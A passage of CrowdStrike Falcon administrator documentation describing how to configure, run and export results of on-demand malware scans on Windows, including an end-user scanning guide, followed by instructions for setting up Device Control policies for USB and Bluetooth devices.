On-demand scanning can result in increased CPU usage, especially while scanning large volumes. CPU resource limits are implemented by controlling the number of worker threads that are used by the scan. The number of worker threads is based on how many CPU cores are available on the local host, allowing Falcon to approximate the overall CPU utilization.

When you create a scan, you specify a performance setting that determines how much of the local CPU’s resources can be used for that scan. To mitigate the risk of performance impact, we recommend setting a lower initial performance threshold. Before wide-scale deployment, we recommend testing performance impact on a sample population of hosts and adjusting CPU utilization settings based on your environment. You can increase the threshold as needed after you’ve observed its effects in your environment. For more information, see our knowledge article, CPU Utilization on Windows Hosts Running On-Demand Scanning (ODS) is higher than expected.

Any files that were previously scanned and haven’t been modified are skipped during the scanning process.

End-user notifications

For each on-demand scan that you create, you can optionally enable notifications that appear on the local host during and after the scanning process.

For scans that end users launch through the right-click menu on the local host, end user notifications are always enabled.

For scans that are triggered by a USB device insertion, end user notifications are determined by the Notify End Users setting in the Sensor Capabilities section of the prevention policy.

The duration of end user notification pop-ups is controlled by local Windows system settings that are outside the control of Falcon.

Custom IOCs and exclusions

Any hash-based IOCs on your allowlist and blocklist take precedence during the scanning process. If a Microsoft-signed Windows binary is added to your blocklist as a hash-based IOC, the IOC is detected on but not quarantined during scanning.

Sensor visibility exclusions are respected during the scanning process.

When you create a scan through the Falcon console or API, you can explicitly exclude specific file paths from scans. During the scanning process, the sensor skips those excluded folders. These exclusions are unique to the on-demand scanning function and aren’t used in any other capacity.

On-demand scan event search

For advanced investigation of malicious files found during scanning, use the search that corresponds to your environment.

Search events using Investigate > Search > Advanced event search with this query:

#event_simpleName=OdsMaliciousFileFound

For more info, see "OdsMaliciousFileFound" in Events Full Reference (Events Data Dictionary).

Limitations and considerations

For Windows sensors earlier than 6.51, scans must be defined with absolute paths. Subfolders are automatically included in these scans.

For Windows sensors 6.51 and later, scans can be defined with either glob expressions or absolute paths.

To facilitate faster scanning, we recommend entering a specific file path when possible. The broader the search criteria, the longer the scanning process will take. For example, file paths starting with ** might take a long time to scan because every drive and subfolder must be traversed when searching for a match.

For more info about scan timing considerations, see Immediate versus scheduled scans.

Considerations for configuring file paths to include in a scan:

Falcon automatically appends a slash (/) to the end of the path.
You can optionally specify a drive letter.
You cannot start the file path with a square-bracket glob syntax prefix. Examples:
- Supported: C:\folder1\subfolder[1-5]\*
- Supported: **\folder1\*
- Not supported: [a-z]:\folder1\*
If you want all files in the specified folder to be scanned, add * to the end of the path. Example:
- C:\folder1\*
Scan subfolders to search for files within a folder structure.
- C:\folder1\
- C:\folder1\**

When specifying a file path to scan or exclude from a scan, Windows path variables, such as %ProgramFiles% and %SystemRoot%, are not supported. Additionally, symbolic links (symlinks) are not supported.

When specifying a file path to exclude from a scan, you can specify glob syntax to more narrowly target the scan. However, glob syntax is not supported when specifying a file path to include in a scan.

Only PE files, such as .exe and .dll files, can be scanned. Archive and data file types, such as .zip and .pst files, are not scanned. The maximum supported file size for PE files is 60 MB.

Only files located on storage that’s considered local to the host are scanned. Examples of scannable drives include internal hard drives, USB devices, and SAN drives. Non-local drives—such as network drives, mapped network shares, and cloud storage drives—are skipped during scanning.

In scan results, unscanned files are represented as Unsupported files.

Because not all file types are scanned, the reported number of files scanned might differ from the total file count. The Malicious files found count includes only PE files.

If a given host is reprovisioned, the Host Management list might contain multiple entries with the same host name. However, only the most recent instance of the host can be scanned. Attempts to scan older instances of a host fail. If the Host Management list contains multiple entries for the same host name, confirm that you’re selecting the most recent instance of that host for scanning. Alternatively, you can start a scan from a host group instead of from an individual host.

Tip: As a best practice, we recommend that you delete all older, duplicate host instances from the Host Management list. For more info about deleting host entries, see Managing inactive and duplicate hosts.

End-user actions

If enabled by policy, end users can perform these actions through the right-click menu on a local host:

Run a scan on a selected file or folder, the full system drive, or all local drives on the host.
View scan status and results.
Cancel, pause, or resume scans that they initiated.
Pause or resume scans that were initiated by other methods.

For detailed info about how end users initiate and manage scans on the local host, see the Windows On-Demand Scanning End User Guide.

Setup

Configuring on-demand scanning is a two-part process:

Configure prevention policy settings:
1. Configure On-Demand Scans Machine Learning and On-Demand Scans category settings as needed. These settings control behavior for scans that are initiated by end users on the local host and for scans that are triggered by USB device insertion on the local host. For more info, see On-Demand Scans category.
2. To enable file quarantining upon scanning of USB storage devices, enable Quarantine on Removable Media in the Quarantine category. For more info, see Quarantine on Removable Media.
Configure settings for individual on-demand scans. For more info, see On-demand scan management.

Consider sharing this information with your end users:

Why CrowdStrike Falcon malware scanning is installed on their computers
How on-demand scanning works
Why and when end users might want to run their own scans
Why and when they might see scanning activity that they didn’t initiate
What follow-up actions you want them to take if malicious files are found
Where they can retrieve quarantined files that you’ve released

You can also share a PDF version of the Windows On-Demand Scanning End User Guide with your end users.

On-demand scan management

Get to on-demand scans

The On-demand scans page is where you can view, create, and manage your on-demand scans. From this page, you can also view and export on-demand scan logs.

Go to Endpoint security > Monitor > On-demand scans

Create a scan

On the On-demand scans page, click Create a scan.
Specify when to run the scan:
- Now: Run the scan immediately.
  - Optional. Specify how much time can elapse before the scan automatically stops.
- In the future: Run the scan at a specified time in the future.
  1. Specify a start date and time that’s in the future for all affected hosts.
    Note: When specifying the time, consider the host's time zone. If a host is in a time zone ahead of your time zone, the sensor may ignore the scan if it appears to be scheduled for a time that has already passed in the host's local time zone.
  2. Optional. Specify how much time can elapse before each occurrence of the scan automatically stops.
  3. Specify a recurrence interval for the scan. If you want the scan to run only once, select Never.
Select the hosts or host groups to scan.
Specify file paths and exclusions. These fields support glob syntax; for more info, see Glob Syntax and Limitations and considerations.
1. Specify one or more absolute file paths to scan, or upload a plain-text file that contains 1,024 or fewer characters. Specify one path per line.
2. Optional. Specify paths to exclude from scans, or upload a plain-text file that contains 1,024 or fewer characters. Specify one path per line.
Optional. Add a descriptive comment about the scan.
Configure Sensor Anti-malware settings for this scan:
- Detection level: Specify a sensor detection level for the scan.
- Prevention level: Specify a sensor prevention level for quarantining files during the scan. For more info, see File quarantining.
Configure Cloud Anti-malware settings for this scan:
- Detection level: Specify a cloud detection level for the scan.
- Prevention level: Specify a cloud prevention level for quarantining files during the scan. For more info, see File quarantining.
Performance: Specify a maximum CPU utilization limit for this scan. For more info, see Performance and CPU utilization.
Configure End-user settings:
1. Optional. To show scan status notifications to end users on the local host, select the Show notifications to end user checkbox.
2. Pause duration: Specify how long user-initiated scans can remain paused by end users. After the specified time period has elapsed, the scan automatically resumes. To allow an unlimited duration, enter 0.
Click Create scan.

After you create a scan, it appears on either the Scan log page or the Scheduled scans page, where you can view its status. When a scheduled scan starts running, the running scan appears on the Scan log page. If a scheduled scan has a recurrence, the next recurring scheduled scan appears on the Scheduled scans page.

Duplicate an on-demand scan

Create a scan by duplicating an existing scan and then modifying the new scan’s settings.

On the On-demand scans page, go to the Scan log or Scheduled scans tab.
Click the scan that you want to duplicate and then, from the Actions menu, select Duplicate scan. The fields in the new duplicated scan are prepopulated with values from the source scan.
Modify settings as described in Create a scan.
Click Create scan.

View on-demand scan logs

View status info about past scans and currently running scans.

A Quarantined designation indicates that the file was quarantined from a USB device during scanning. However, the file might have subsequently been released by a Falcon administrator.

Note: Because not all file types are scanned, the reported number of files scanned might differ from the total file count. The Malicious files found count includes only PE files.

For more info about scan status values, see On-demand scan status values.

Scan log entries are retained for 90 days.

On the On-demand scans page, go to the Scan log tab.
Adjust your view by filtering or sorting the log entries.
Click any log entry to see more details.

View scheduled scans

View info about your scheduled scans.

For info about scan status values, see On-demand scan status values.

On the On-demand scans page, go to the Scheduled scans tab.
Adjust your view by filtering or sorting the log entries.
Click any log entry to see more details.

Export on-demand scan logs or scheduled scan info

Export one or more on-demand scan logs in CSV or JSON format. You can also export information about your scheduled scans.

For info about the contents of exported files, see Exported file fields.

On the On-demand scans page, go to the Scan log or Scheduled scans tab.
Adjust your view by filtering or sorting the entries.
Select the checkboxes for the relevant scans, click Export, and then click either CSV or JSON. Falcon prepares the file for download.

Note: The file preparation process can take up to 15 minutes to complete.
Click Download.

Note: You can also export logs for a specific scan from its scan details page. When you export these scan logs, any associated detections are also included in the exported file.

Cancel a running scan

Cancel one or more scans that are in progress. If you cancel a scan, its status changes to Canceled and any partial results are available for viewing in scan logs. If the scan was initiated according to a recurring schedule, all future instances of the scan will continue to run as scheduled.

Note: Scans initiated by end users can be canceled only through the right-click menu on the local host.

On the On-demand scans page, go to the Scan log tab.
Adjust your view by filtering or sorting the log entries.
Select the checkboxes for the scans that you want to cancel, and then click Cancel scans.

Delete a scheduled scan

If you delete a scheduled scan, no future instances of that scan will run. However, the results from any past runs remain available in the scan log. For more info, see View on-demand scan logs.

On the On-demand scans page, go to the Scheduled scans tab.
Adjust your view by filtering or sorting the log entries.
Select the checkboxes for the scheduled scans that you want to delete, and then click Delete scans.

On-demand scan status values

This table describes the possible status values for on-demand scans.

For info about viewing on-demand scan logs, see View on-demand scan logs.

Status	Description
Running	The scan is currently running.
Scheduled	The scan is scheduled to start running at the specified date and time. A scheduled scan runs at the specified time in each host’s local time zone.
Pending	The host is currently running another scan. The scan will begin when host resources become available.
Complete	The scan has finished running.
Incomplete	The scan started running, but did not complete.
Paused	The scan is currently paused.
Canceled	The scan was canceled.
Failed	The scan failed before it could complete. A failed scan can be caused by these conditions: The host isn’t responding The specified file path can’t be accessed The scan was scheduled to run in the past for the host’s local time zone

Exported file fields

For info about exporting on-demand scan logs or scheduled scan details in CSV or JSON format, see Export on-demand scan logs or scheduled scan info.

For more info about configurable scan settings and their possible values, see Create a scan.

Field	Description	Scan types	Export-file types
`id`	The unique identifier for the scan object	Immediate scans Scheduled scans	JSON CSV
`cid`	The CID that the scan was created on	Immediate scans Scheduled scans	JSON
`profile_id`	The unique identifier for the scan configuration	Immediate scans Scheduled scans	JSON CSV
`description`	The user-configured scan description	Immediate scans Scheduled scans	JSON CSV
`file_paths`	The absolute file paths to scan	Immediate scans Scheduled scans	JSON CSV
`scan_exclusions`	The file paths to exclude from scanning	Immediate scans Scheduled scans	JSON CSV
`scan_inclusions`	The file paths to scan	Immediate scans Scheduled scans	JSON CSV
`initiated_from`	How the scan was triggered. Possible values: `falcon_adhoc`: Scan initiated by a Falcon user `cloud_adhoc`: Scan initiated by CrowdStrike API `cloud_scheduled`: Scan initiated according to a configured schedule `endpoint_user:` Scan initiated by an end user on a local host `auto_usb`: Scan triggered by USB storage device inserted on a host	Immediate scans Scheduled scans	JSON CSV
`quarantine`	Indicates whether file quarantining is enabled or disabled for the scan	Immediate scans Scheduled scans	JSON CSV
`cpu_priority`	The level of host CPU utilization configured for the scan. Possible values: `1`: Lowest `2`: Low `3`: Medium `4`: High `5`: Highest	Immediate scans Scheduled scans	JSON CSV
`preemption_priority`	Indicates the priority of the scan compared to other scans running on the host. Values are determined by scan type: `1`: Cloud ad hoc (highest priority) `5`: USB device insertion `10`: Endpoint user `15`: Scheduled (lowest priority)	Immediate scans Scheduled scans	JSON CSV
`metadata.host_id`	The unique identifier for the host running the scan	Immediate scans Scheduled scans	JSON CSV
`metadata.host_scan_id`	The unique identifier given by sensor for the scan running on the host	Immediate scans	JSON CSV
`metadata.scan_host_metadata_id`	The unique identifier for a single host’s scan	Immediate scans	JSON
`metadata.filecount.scanned`	The number of files scanned. For more info, see Limitations and considerations.	Immediate scans	JSON CSV
`metadata.filecount.malicious`	The number of malicious files found during the scan. For more info, see Limitations and considerations.	Immediate scans	JSON CSV
`metadata.filecount.quarantined`	The number of files quarantined during the scan	Immediate scans	JSON CSV
`metadata.filecount.traversed`	The total number of files traversed during the scan	Immediate scans	JSON CSV
`metadata.filecount.skipped`	The number of files skipped during the scan because they weren’t supported file types	Immediate scans	JSON CSV
`metadata.status`	The current status of the scan. For more info, see On-demand scan status values.	Immediate scans Scheduled scans	JSON CSV
`metadata.started_on`	The date and time when the scan began, in each host’s local time zone	Immediate scans	JSON CSV
`metadata.completed_on`	The date and time when the scan completed, in each host’s local time zone	Immediate scans	JSON CSV
`metadata.last_updated`	The date and time when the scan was last updated	Immediate scans Scheduled scans	JSON CSV
`status`	The overall status rolled up from the status of each host in the metadata	Immediate scans Scheduled scans	JSON CSV
`host`	The list of hosts to be scanned, as defined during scan creation	Immediate scans	CSV
`host_groups`	The list of host groups to be scanned, as defined during scan creation	Immediate scans Scheduled scans	JSON CSV
`endpoint_notification`	Indicates whether end-user notifications are enabled or disabled for the scan. For more info, see End-user notifications.	Immediate scans Scheduled scans	JSON CSV
`pause_duration`	The maximum time that a user-initiated scan can remain paused before it automatically resumes	Immediate scans Scheduled scans	JSON CSV
`max_duration`	The maximum time that can elapse before a scan automatically stops. A value of 0 indicates an unlimited duration.	Immediate scans Scheduled scans	JSON CSV
`sensor_ml_level_detection`	The sensor ML detection level for the scan	Immediate scans Scheduled scans	JSON CSV
`sensor_ml_level_prevention`	The sensor ML prevention level for quarantining files during the scan	Immediate scans Scheduled scans	JSON CSV
`cloud_ml_level_detection`	The cloud ML detection level for the scan	Immediate scans Scheduled scans	JSON CSV
`cloud_ml_level_prevention`	The cloud ML prevention level for quarantining files during the scan	Immediate scans Scheduled scans	JSON CSV
`severity`	The highest severity level of all malicious files found when scanning all of the hosts for this scan	Immediate scans	JSON CSV
`schedule.start_timestamp`	The scheduled start time for the scan	Scheduled scans	CSV
`schedule.interval`	The specified time interval between recurring scheduled scans	Scheduled scans	CSV
`scan_started_on`	The date and time when the scan started on the first host	Immediate scans	JSON CSV
`scan_completed_on`	The date and time when the scan completed on all hosts	Immediate scans	JSON CSV
`created_by`	The name of the Falcon user who created the scan	Immediate scans Scheduled scans	JSON CSV
`created_on`	The date and time when the scan was created	Immediate scans Scheduled scans	JSON CSV
`last_updated`	The date and time when the scan was last updated	Immediate scans Scheduled scans	JSON CSV
`deleted`	Indicates whether the scan was deleted	Scheduled scans	JSON CSV

On-demand scanning CLI

The on-demand scanning CLI can be invoked on the local host to initiate scans and view scan results.

Invoke the on-demand scanning CLI on the local host, separating folders with backslashes:

C:\Program Files\Crowdstrike\CsScancli.exe <switch>=[params]

Important: Separate folders with backslashes, not forward slashes.

Parameter	Description
`--scan={path}`	Scan the specified file or folder.
`--scan-system-drive`	Scan the system drive.
`--scan-all-drives`	Scan all drives.
`--quarantine={true/false}`	Used with `--scan` commands. Enable or disable file quarantining during scanning.
`--stop`	Stop active scan.
`--pause`	Pause scanning.
`--resume`	Resume scanning.
`--status={ID}`	Optional. Specify a scan ID to get the scan status. To get the statuses of all scans, omit this parameter.

Example command:

"C:\Program Files\Crowdstrike\CsScancli.exe" –-status

Note: Falcon sensor for Windows version 7.01 and later uses UTC time in its output.

CrowdStrike Falcon Malware Scanning User Guide

A guide that you can provide to end users who want to run CrowdStrike Falcon malware scans on their local Windows computers.

CrowdStrike Falcon Malware Scanning User Guide

This guide is for end users who want to run CrowdStrike Falcon malware scans on their local Windows computers.

Understanding CrowdStrike Falcon malware scanning

CrowdStrike Falcon malware scanning can detect and quarantine portable executable (PE) files that contain dormant malware before they execute.

When you initiate a CrowdStrike Falcon malware scan, it runs immediately on your local Windows computer. For example, you might want to run a malware scan after you’ve downloaded new files on your computer, or when you’ve noticed unusual behavior on your computer.

You can run a scan on a selected file or folder, the full system drive, or all drives on your computer. Subfolders are automatically included in scans.

Only PE files, such as .exe and .dll files, can be scanned. Additionally, only files saved locally are scanned. Examples of scannable files include files on your computer’s hard drive, or files on a USB storage device or SAN drive that’s attached to your computer. Network drives, mapped network shares, and cloud storage drives are skipped during scanning.

Depending on how your CrowdStrike Falcon administrator has configured scanning, scans might also be initiated by your administrator or through an automated trigger. For example, a scan might automatically start whenever you insert a USB storage device into your computer.

Depending on how your CrowdStrike Falcon administrator has configured scanning, temporary status notifications might appear during and after the scanning process.

Quarantined files

Depending on how your CrowdStrike Falcon administrator has configured scanning, malicious files might be quarantined during a scan.

Files that were quarantined from a USB device and then subsequently released by your administrator are added to C:\ProgramData\CrowdStrike on your computer.

Running and managing scans

Get to the CrowdStrike Falcon malware scanning menu

The CrowdStrike Falcon malware scanning menu is where you can start, pause, resume, or stop a scan, and where you can view the results of a scan. The available menu selections vary depending on the context and status of a scan.

On your local computer, right-click your Windows desktop or a specific file or folder, and then select CrowdStrike Falcon malware scan. A menu shows the available scanning options.

Scan a specific file or folder

Initiate a CrowdStrike Falcon malware scan of a specific file or folder on your local computer.

On your local computer, right-click the file or folder that you want to scan, and then select CrowdStrike Falcon malware scan > Scan. The scan begins running.

For info about viewing scan results, see Viewing scan status and results.

Scan the full system drive

Initiate a CrowdStrike Falcon malware scan of the full system drive (for example, the C: drive) on your local computer.

On your local computer, right-click the Windows desktop, and then select CrowdStrike Falcon malware scan > Scan system drive. The scan begins running.

For info about viewing scan results, see Viewing scan status and results.

Scan all local drives

Initiate a CrowdStrike Falcon malware scan of all drives on your local computer.

On your local computer, right-click the Windows desktop, and then select CrowdStrike Falcon malware scan > Scan all drives. The scan begins running.

For info about viewing scan results, see Viewing scan status and results.

Pause or resume a scan

Pause or resume a currently running scan that was initiated by your CrowdStrike Falcon administrator or by another method.

Note: If your CrowdStrike Falcon administrator configured a maximum pause duration, the scan automatically resumes after the maximum pause time has elapsed.

On your local computer, right-click the Windows desktop, and then select CrowdStrike Falcon malware scan (in progress) > Pause scan or CrowdStrike Falcon malware scan (in progress) > Resume scan.

Stop a scan

Stop a scan that you initiated before it finishes running. You cannot restart a stopped scan.

Note: You can stop scans that you initiated. However, you cannot stop scans that were initiated by your CrowdStrike Falcon administrator or by another method.

On your local computer, right-click the Windows desktop, and then select CrowdStrike Falcon malware scan (in progress) > Stop scan. The scan stops running.

Viewing scan status and results

View scan status

Depending on how your CrowdStrike Falcon administrator has configured scanning, temporary status notifications might appear during and after the scanning process.

View scan results

View the results of CrowdStrike Falcon malware scans that have run on your local computer, including info about any files that were quarantined. For more info about quarantined files, see Quarantined files.

Scan results are purged after your computer reboots.

Because not all file types are scanned, the reported number of files scanned might differ from the total file count in the scan results.

On the local computer, right-click the Windows desktop, and then select CrowdStrike Falcon malware scan > See results of last scan. The scan results appear.

CrowdStrike Falcon malware scanning field reference

These fields might appear when you’re viewing scan status notifications or scan results. The exact fields shown depend on the specific notification or scan type.

Field	Description
Scan ID	The unique identifier for the scan
Status	The current status of the scan
Initiated from	The event or entity that triggered the scan
Start time	The date and time when the scan started, in the local computer’s time zone
End time	The date and time when the scan stopped, in the local computer’s time zone
Scanned files	The total number of portable executable files that were scanned Note: Only PE files, such as `.exe` and `.dll` files, are scanned.
Traversed files	The total number of files that were traversed in the specified file paths, including files that were skipped during scanning
Unsupported files	The number of files that were traversed but not scanned
Total seen files	The total number of files in the selected folders or drives, including scanned files, unsupported files that were skipped, and files that were explicitly excluded from scanning by your Falcon administrator
Suspicious file count	The number of scanned PE files that contained malware
Root scan path	The top-level path that was scanned
Suspicious files	The path for each scanned file that contained malware

Device Control, Firewall Management, and ZTA

Device Control

Create USB device policies to gain visibility into and control over USB devices in your environment.

Overview

Device Control provides visibility as well as blocking and granular control over supported removable device and Bluetooth device connections in your network. Create policies to gain visibility into and control over these devices in your environment.

Configure policies to control which USB devices and internal SD card readers can connect to your Windows and Mac hosts.
Configure policies to control which Bluetooth and Thunderbolt mass storage devices can connect to your Mac hosts.
Fine-tune your policies with exceptions for USB and Bluetooth devices.
Customize end-user notifications.
Review Device Control dashboards to see supported device connections, device policy violations, and actions taken automatically by your policies.

Device Control is an add-on module for Falcon Insight XDR, Falcon Prevent, or Falcon Pro subscriptions.

Configure Device Control policies to improve your organization’s security posture:

Apply policies to all devices and hosts and set up exceptions to allow select devices on select hosts.
Grant individual device permissions that range from fully blocking devices to allowing complete functionality.
Configure policies to monitor when you only want to collect data, configure them to enforce when you’re ready for them to take action.
Customize the notification that a user sees when a supported removable or Bluetooth device is blocked or given restricted access.

After you’ve configured your policies and assigned them to hosts, you can monitor supported removable and Bluetooth device connections in the Falcon console. Each time a device attempts to connect to a host, the Falcon sensor logs an event that contains information about the connection attempt.

Review device connection activity and events to understand how these devices are used in your organization and fine-tune your Device Control policy settings and exceptions over time to meet your organization’s specific needs.

Requirements

Subscriptions: Falcon Device Control

Sensor support: All supported versions of the Falcon sensor for Windows and macOS

Operating system requirements: Device Control supports all Falcon-supported OSes for Windows and macOS

Reboot requirements:

Windows: Hosts must be rebooted after initially enabling Device Control
macOS: No reboot requirement

Roles:

Users with these roles can manage USB device policies:
- Falcon Administrator
- Device Control Manager
Users with these roles can view device connections:
- Falcon Security Lead
- Falcon Investigator
- Falcon Analyst

Permissions required for custom roles: All permissions in the Device Control permission group are required for custom roles to fully manage and view Device Control policies and dashboards.

CrowdStrike Clouds: Available in all clouds

Supported device types

Device Control supports these device types for Windows and Mac:

USB devices
Internal SD card readers

Device Control supports these device types only for Mac:

Bluetooth devices
External Thunderbolt mass storage devices

Limitations

Device Control might not function as expected in the following situations.

For macOS and Windows:

Unformatted CDs or DVDs that report as Mass Storage devices cannot be blocked using Mass Storage device class settings or exceptions due to a Windows limitation. To block these devices, an Any Class exception containing the CD or DVD's combined ID must be created in the policy, or the CD/DVD must be formatted, after which it can be controlled using Mass Storage policy settings.

For Windows only:

For Virtual Machines (VM) such as Citrix and VMWare, global allowlisting is not supported, and as a result incompatible devices should not be used.
Known VID/PID for incompatible devices include (but are not necessarily limited to):
- 0x19D2 / 0x10D6 ZTE Devices (CD-ROM, 4G Modem)
- 0x19D2 / 0x1225 ZTE
- 0x19D2 / 0x1403 ZTE
- 0x056E / 0x1042 Elecom Numpad M-BL26UBC
- 0xC1CA / 0x0004 –
- 0x1FF7 / 0x0F21 CVTE Touchscreen devices (OEM vendor)
- 0x1FF7 / 0x0F22 CVTE
- 0x0403 / ( * ) Virtual serial devices using FTDI UART
Using Device Control and Dell Data Protect DDPE can cause errors, including BSODs for the host and is not recommended.
For Virtual Desktop Infrastructures (VDIs) such as Citrix Virtual Apps and Desktop and VMware Horizon, compatibility issues can cause errors, including BSODs for the host, as a result we do not recommend using Device Control on hosts running VDIs.
Vodafone network dongles or Elecom numpad devices
- Device Control does not work on these devices.
USB forwarding technologies such as RemoteFx, RDP: To block devices, you must apply USB device policies on the server, not the client.
Custom/third party USB device stacks or UAS storage drivers such as ASUS USB 3.0 Boost:
- USB devices initialized on third-party USB stacks aren't blocked by Device Control.
- On Windows 7 hosts, Device Control can't block USB 3.0 drives.
- Device Control doesn’t work correctly when DLP applications are active.
- DLP Applications such as Digital Guardian will cause Device Control to not function as expected.
Windows to Go: Boot disks aren't blocked by Device Control.
Bluetooth devices that do not have a USB dongle, such as mice or keyboards, are not supported for Windows.

Before you begin

You should be familiar with these important concepts:

Falcon's Host and Host Group Management, Prevention Policy Settings, and Policy precedence
USB protocol standards for device classes
Bluetooth protocol standards for device classes

Get started

Out of the box, all host groups are assigned to the default policy, which is initially configured to allow all supported removable and Bluetooth device connections. Create, configure, and assign a collection of Device Control policies to your hosts to block and allow device connections.

Plan and prepare

Determine what specific supported removable and Bluetooth device connections need to be allowed on certain hosts in your organization. Identify hosts that should have particularly limited device connection allowances.
Assign the Device Control Manager role to additional Falcon users who need to be able to create and configure Device Control policies.
Understand the risk of potentially blocking all supported removable and Bluetooth device connections. Device Control grants you flexibility and control to create and configure policies. Be aware that this includes the ability to create and assign policies that could block essential supported removable or Bluetooth device connections. Configuring the default USB, PCIe, and Bluetooth policy settings to Monitor only is a helpful safeguard. This ensures that the catch-all policy for hosts that are not specifically added to any other Device Control policies won’t have any blocking actions taken on them.
To apply Bluetooth Device Control policies, end users on Mac hosts must grant permissions to use the Apple Privacy Preferences Policy Control API for Bluetooth plugin on Sonoma and later. When an enabled policy’s Bluetooth mode is set to Monitor only or Monitor and enforce, all users assigned to that policy that have not already granted permissions will receive a pop up asking Falcon for Bluetooth permissions. Users must click Allow in order for Falcon to monitor Bluetooth activity and enforce Bluetooth controls. If you use an MDM to manage your Mac hosts, you can grant this permission through the MDM without need for user input. For more info, see our knowledge article Granting Permission for Bluetooth Device Control Policies with an MDM.
Determine whether the default notification message for a blocked or access restricted device is appropriate for your organization. To set a customized default notification, go to Support and resources > Resources and tools > General settings , click Notifications, and go to the USB and PCIe device control end-user notifications and/or the Bluetooth device control end-user notifications section. You can create a custom notification message for each policy you configure.
You can configure up to 1,000 Device Control policies in the Falcon console. If you're using the API, you can request a Device Control policy limit of 5,000. For more info, contact your CrowdStrike account representative.

Default configuration

A policy must be enabled for its settings to take effect on assigned hosts. When a Device Control policy is disabled, hosts adopt the settings and rules from the next policy they are assigned to according to policy precedence.

Throughout Falcon policies, the default policy is the last policy in the order of precedence. It cannot be disabled, and is applied to all hosts that aren’t assigned to another enabled policy. Configure your default policy to be a safe catch-all that you’re comfortable applying to any of your organization’s hosts.

Each host can belong to one or more host groups. Host groups can be assigned one or more policies. With dynamic groups, a newly-installed sensor inherits the relevant groups and applies the policy with highest precedence to the host. This provides the host with its initial policy settings. If a host is not a part of any groups, or its groups have no policies assigned, it is automatically assigned to the default policy.

Windows:

Policy mode: Monitor only
Device settings: All set to Full access

Mac:

Policy mode for USB: Monitor only
Policy mode for Bluetooth and PCIe: Off
Note: Setting the PCIe policy mode to Off is supported only for Falcon sensor for Mac versions 7.33 and later. If you set this mode to Off for sensor versions 7.32 and earlier, those sensors will use the configured USB mode instead.
Device settings: All set to Full Access

View Device Control policies

Go to Endpoint security > Device control > Device policies to manage your organization’s Device Control policies.

Configure policy permissions for USB devices

Set the policy mode to one of the following options:
- Monitor
- Monitor and Enforce
- Off (macOS only)
Click any USB device class to configure policy settings for that class:
- Audio and Video: Includes headsets, microphones, speakers, and webcams.
- Imaging: Includes digital cameras.
- Mass Storage: Includes flash drives, hard drives, and SD card readers.
- Mobile, Media Transfer Protocols (MTP) and Picture Transfer Protocols (PTP): Includes mobile phones and tablets.
- Printer: Only includes printers.
- Wireless: Does not include Wi-Fi adapters. Includes bluetooth devices with a USB dongle, such as mice or keyboards, and bluetooth devices that are not integrated, such as headphones.
  
  Note: When a device does not belong to any of the device classes listed above, the device goes into the Any Class class. By default, devices in this class have Full access permissions and are allowed to function. To control the permissions level for such a device, add an exception to the Any Class class for the device. See Device Control policy exceptions.
Select the level of access for devices of that class:
- Full access (or Read, write and execute, for the Mass Storage class)
- Full block
- Read and write only (applies only to the Mass Storage class)
- Read only (applies only to the Mass Storage class)
Optional. Click Add exception and follow the instructions to add an exception to this policy. See Device Control policy exceptions
Optional. Click to disable Enhanced file metadata collection.
Optional. Click to disable End-user notifications.
Click Save.
Then click Save to confirm.

Note: Devices with multiple classes are completely blocked when you block any single class, except for Mass Storage which you can control independently. When you block Mass Storage on a printer with both Printer and Mass Storage classes, the printer continues working while still blocking storage functions. Use the Any Class device class to create an exception that controls all of the composite device's functionality.

Assign a Device Control policy to host groups

Assigning a Device Control policy works the same as assigning other types of policies.

Windows: Device Control policies take effect when a supported removable device is connected to a host. If a host has devices connected when you assign a policy, those devices aren't affected until the next time they're reconnected or the next time the host reboots.
macOS: Device Control policies take effect when a supported removable or Bluetooth device is connected to a host. If a host has devices connected when you assign a policy, the policy will take effect immediately, meaning that if the policy blocks that device, it will be disconnected.

Follow these steps to assign a Device Control policy to a group.

Go to Endpoint security > Device control > Device policies .
Click the policy you want to assign to a group.
Go to the Assigned Host Groups tab.
Click Assign groups to policy.
Select one or more groups.
Click Assign groups.

Test Device Control policies

Device Control testing can be done by using a test group of hosts or configuring Device Control policies to Monitor only, or a combination of the two approaches.

If you limit your testing to a test group of hosts, you’ll need to add the rest of your host groups to your Device Control policies as needed.
If you perform your testing by configuring your Device Control policies to Monitor only and observing the device connections, going live will involve updating some of your policies to Monitor and enforce as needed.

Device Control policies

The settings within a Device Control policy determine whether a device is allowed to connect to a host.

For USB and Bluetooth devices, you can further refine access based on device class, such as mass storage or audio/video devices. Within each class, you can set exceptions, more specific configurations that override the general policy setting.

At the policy level, Device Control policies have these policy options:

Monitor and enforce: Takes action on devices based on your policy settings: blocking or allowing the device connection and displaying default or custom notification messages.
Monitor only: Records the device connection and the action defined by your policy setting, but doesn’t enforce restrictions on assigned hosts. This mode is intended to help you test your policy behavior without disrupting users in your environment.
Off (macOS only): Has no device visibility, so doesn’t track violations or enforce restrictions.
Policy propagation: Users with Falcon Flight Control can enable or disable policy propagation from parent to child CIDs. For more info about Device Control policy propagation, see Device Control policies in multi-CID environments.

Like other Falcon policies, Device Control policies are processed according to precedence (sequential order) on the hosts they’re assigned to, so it’s important to consider this when configuring your organization’s Device Control policies.

Policy precedence determines which policy's settings are applied to a host when the host is a member of more than one policy. Define policies with different precedences to resolve conflicts. Then, when faced with a conflict, the cloud will automatically apply the policy with the higher precedence (1 being higher than 2, which is higher than 3, and so on).

On a host, the policy with the highest ranking precedence (1 being highest) is applied and active. If something changes with that highest-ranking policy, for example if it gets disabled, then the next highest-ranking policy gets applied and becomes active.

Tip: For info about how policies work, including host group assignment and policy precedence, see Policies in Falcon.

Manage Device Control policies

Go to Endpoint security > Device control > Device policies to manage your organization’s Device Control policies. From here, you can enable, disable, duplicate, or delete a policy.

Note: Use the platform dropdown selector to toggle between Windows or Mac policies.

Change Device Control policy precedence

Follow these steps to reorder Device Control policy precedence.

Go to Endpoint security > Device control > Device policies .
Click Edit precedence.
To reorder the policies, use the arrows in the precedence column to drag a policy up or down.
Click Save.

Enable a policy

Follow these steps to enable a policy.

Go to Endpoint security > Device control > Device policies .
Click to open the policy.
Click to select Enable policy.
Then click Enable policy to confirm.

Duplicate a policy

Follow these steps to duplicate a policy.

Go to Endpoint security > Device control > Device policies .
Click to open the policy.
Click Duplicate policy.
Enter a new name and description, if desired, then click Duplicate to confirm.

The new copy opens immediately.

Edit a policy

Follow these steps to edit a Device Control policy.

Go to Endpoint security > Device control > Device policies .
Click to open the policy you want to edit.
Edit the policy settings and exceptions.
Click Save then click Save again to confirm.

Disable a policy

Follow these steps to disable a Device Control policy.

Go to Endpoint security > Device control > Device policies .
